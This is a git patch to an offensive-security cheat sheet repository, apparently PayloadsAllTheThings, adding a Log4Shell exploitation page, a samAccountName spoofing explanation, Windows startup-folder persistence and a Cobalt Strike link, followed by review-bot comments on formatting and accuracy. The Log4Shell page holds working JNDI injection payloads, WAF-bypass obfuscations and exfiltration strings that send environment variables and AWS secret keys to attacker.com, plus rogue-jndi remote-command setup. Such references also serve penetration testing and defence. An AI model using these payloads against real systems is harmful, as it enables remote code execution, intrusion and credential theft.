From 0d6d6049ce03272d6e934247ab57263bc04ea625 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 16 Dec 2021 09:52:51 +0100 Subject: [PATCH] AD + Log4shell + Windows Startup --- CVE Exploits/Log4Shell.md | 105 ++++++++++++++++++ .../Active Directory Attack.md | 3 + .../Cobalt Strike - Cheatsheet.md | 3 +- .../Windows - Persistence.md | 8 ++ 4 files changed, 118 insertions(+), 1 deletion(-) create mode 100644 CVE Exploits/Log4Shell.md diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md new file mode 100644 index 0000000..6ca8e89 --- /dev/null +++ b/CVE Exploits/Log4Shell.md 
@@ -0,0 +1,105 @@ +# CVE-2021-44228 Log4Shell + +> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled + +## Summary + +* [Vulnerable code](#vulnerable-code) +* [Payloads](#payloads) +* [Scanning](#scanning) +* [WAF Bypass](#waf-bypass) +* [Exploitation](#exploitation) + * [Environment variables exfiltration](#environment-variables-exfiltration) + * [Remote Command Execution](#remote-command-execution) +* [References](#references) + +## Vulnerable code + +You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn]( +https://github.com/leonjza/log4jpwn) +```java +public String index(@RequestHeader("X-Api-Version") String apiVersion) { + logger.info("Received a request for API version " + apiVersion); + return "Hello, world!"; +} +``` + +## Payloads + +```bash +# Identify Java version and hostname +${jndi:ldap://${java:version}.domain/a} +${jndi:ldap://${env:JAVA_VERSION}.domain/a} +${jndi:ldap://${sys:java.version}.domain/a} +${jndi:ldap://${sys:java.vendor}.domain/a} +${jndi:ldap://${hostName}.domain/a} +${jndi:dns://${hostName}.domain} + +# More enumerations keywords and variables +java:os +docker:containerId +web:rootDir +bundle:config:db.password +``` + +## Scanning + +* [log4j-scan](https://github.com/fullhunt/log4j-scan) + ```powershell + usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] + [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] 
[--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] + python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test + python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass + ``` +* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml) + + +## WAF Bypass + +```powershell +${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a} + +# using lower and upper +${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc} +${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc} +${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} + +# using env to create the letter +${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} +${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} +``` + +## Exploitation + +### Environment variables exfiltration + +```powershell +${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/ + +# AWS Access Key +${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY} +``` + + +### Remote Command Execution + +* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi) + ```ps1 + java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21" + Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference + Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference + Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat + Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy + Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1 + Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1 + Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2 + Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2 + 
``` +* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit) + + +## References + +* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day/) +* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/) +* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b7b5d36..c9644aa 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -39,6 +39,7 @@ - [Alternatives - modules](#alternatives---modules) - [Using Mimikatz DCSync](#using-mimikatz-dcsync) - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) + - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) - [Password spraying](#password-spraying) - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing) - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list) 
@@ -675,6 +676,8 @@ Requirements: #### samAccountName spoofing +> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller. + **Requirements** * MachineAccountQuota > 0 diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index de13806..c0f374e 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md 
@@ -500,4 +500,5 @@ beacon> PortBender redirect 445 8445 * [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) * [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) * [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) -* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) \ No newline at end of file +* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) +* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index b17d638..39847c0 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -18,6 +18,7 @@ * [Registry HKLM](#registry-hklm) * [Winlogon Helper DLL](#) * [GlobalFlag](#) + * [Startup Elevated](#startup-elevated) * [Services Elevated](#services-elevated) * [Scheduled Tasks Elevated](#scheduled-tasks-elevated) * [Binary Replacement](#binary-replacement) @@ -235,6 +236,13 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\not reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" ``` +### Startup Elevated + +Create a batch script in the user startup folder. + +```powershell +C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp +``` ### Services Elevated
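Review bot: In the Scanning block of the new CVE Exploits/Log4Shell.md, the two invocation lines do not match the usage line printed just above them: the usage string advertises `--run-all-tests` but the example calls `--run-all-test`, and the second example targets port `808` while the first uses `8081` and the `docker run` command under Vulnerable code publishes the lab app on `8080`. Suggest `python3 log4j-scan.py -u http://127.0.0.1:8080 --run-all-tests` and the `--waf-bypass` call against the same port so a reader can run the lab end to end. Minor: the Scanning, WAF Bypass and Exploitation fences are tagged `powershell` although their content is shell usage and `${jndi:...}` lookup strings; `bash`, as already used for the Payloads block, or `text` would render more honestly. The description only names the affected range (`<=2.14.1`) and no fixed version; adding the patched release beside that statement would let readers check their own exposure rather than only test it.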
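Review bot: The new summary entry `- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)` in Active Directory Attack.md has no matching heading anywhere in this commit: the diffstat shows only 3 insertions for that file, and the other two are the samAccountName blockquote, so either the section already existed without a TOC entry or this anchor is dead. Please confirm a heading with exactly that slug exists, otherwise add the section together with the entry.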
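Review bot: The blockquote added under samAccountName spoofing quotes a third-party explanation verbatim but names no source; add the link inline after the quote or in the file's References so the attribution is visible. Style: the dollar sign is escaped as `'\$'` in five places but left bare in `appending a '$'`, which renders inconsistently; pick one form. Since the Requirements list directly below already states `MachineAccountQuota > 0`, a one-line note that lowering that quota to 0 removes the first prerequisite would give defenders reading this section something actionable.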
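Review bot: The Cobalt Strike - Cheatsheet.md hunk still ends with `\ No newline at end of file` after the new User Guide link, which is also why the unchanged Rasta Mouse line appears as removed and re-added. Adding a trailing newline to the file now avoids the same one-line churn on every future reference append.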
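Review bot: The new `* [Startup Elevated](#startup-elevated)` entry in the Windows - Persistence.md summary is fine, but the two context lines directly above it, `* [Winlogon Helper DLL](#)` and `* [GlobalFlag](#)`, still carry empty anchors; while touching this list, point them at their section slugs so the summary links resolve.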
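Review bot: In the new Startup Elevated section, the sentence `Create a batch script in the user startup folder.` does not match the path shown, `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`, which is the all-users (common) Startup folder rather than a per-user one; that is consistent with the Elevated heading, since writing there requires administrative rights, so reword to "all-users startup folder (requires elevation)". The `powershell` fence around a bare path is also misleading; `text` would be clearer. From a detection standpoint, a sentence noting that file creation in this directory is a persistence indicator worth alerting on in endpoint monitoring would round out the section.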